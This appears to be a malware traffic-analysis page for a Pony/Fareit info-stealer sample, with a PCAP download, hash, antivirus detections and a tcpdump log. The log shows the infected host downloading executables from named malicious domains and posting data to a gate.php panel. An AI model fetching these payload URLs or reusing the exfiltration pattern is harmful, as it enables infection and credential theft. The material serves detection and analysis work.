Text Example

Pony Fareit Trojan Downloader Malware Dropper shit.exe indulogstics.com Traffic Analysis PCAP file download

Download Attachments

  • 1 pcap byte_output
    Date added: January 21, 2017 11:39 pm Added by: admin File size: 5 KB Downloads: 120
SHA256: ec3d9d618092ce434b380cff940b0e74163f30b2dc038541267dbdac5011dcbb
File name: byte_outputC44D35F.exe
Detection ratio: 42 / 55
Analysis date: 2017-01-21 23:31:44 UTC ( 0 minutes ago )
Jiangmin Trojan.PSW.Fareit.ide 20170121
K7AntiVirus Riskware ( 0040eff71 ) 20170121
K7GW Riskware ( 0040eff71 ) 20170121
Kaspersky Trojan-PSW.Win32.Fareit.cjuc 20170121
Malwarebytes Spyware.Pony 20170121
McAfee Artemis!92A2A079B555 20170121
McAfee-GW-Edition BehavesLike.Win32.Trojan.ct 20170121
eScan Trojan.GenericKD.4181990 20170121
Microsoft PWS:Win32/Fareit.AC 20170121
Panda Trj/GdSda.A 20170121
Qihoo-360 HEUR/QVM03.0.9D4A.Malware.Gen 20170122
Rising Malware.Strealer!8.1EF-jN8jw17sYES (cloud) 20170121
Sophos Troj/Fareit-BZU 20170121
Symantec ML.Relationship.HighConfidence [Infostealer.Limitail] 20170121
TrendMicro TROJ_FRS.0NA003AJ17 20170121
TrendMicro-HouseCall TROJ_FRS.0NA003AJ17 20170122
VIPRE Trojan.Win32.Generic!BT 20170122
ViRobot Trojan.Win32.Z.Agent.110592.CYL[h] 20170121
Yandex Trojan.PWS.Fareit!knLZJKpbzRw 20170121

2017-01-21 01:41:42.772969 IP 192.168.1.102.50670 > 195.154.34.135.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /jazy/byte_outputC44D35F.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: arcolermittal.com
Connection: Keep-Alive

2017-01-21 01:42:04.921591 IP 192.168.1.102.56672 > 75.75.75.75.53: 13071+ A? indulogstics.com. (34)
2017-01-21 01:42:05.056388 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [S], seq 142498271, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-01-21 01:42:05.176909 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [.], ack 3963894227, win 64240, length 0
2017-01-21 01:42:05.177675 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /dave/byte/gate.php HTTP/1.0
Host: indulogstics.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 339
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2017-01-21 01:42:05.301201 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [P.], seq 274:613, ack 1, win 64240, length 339: HTTP
2017-01-21 01:42:05.504234 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [.], ack 227, win 64015, length 0
2017-01-21 01:42:05.528779 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [F.], seq 613, ack 227, win 64015, length 0
2017-01-21 01:42:05.533849 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [S], seq 3717785004, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-01-21 01:42:05.655627 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [.], ack 3370541074, win 64240, length 0
2017-01-21 01:42:05.656350 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [P.], seq 0:186, ack 1, win 64240, length 186: HTTP: GET /dave/byte/shit.exe HTTP/1.0
Host: indulogstics.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
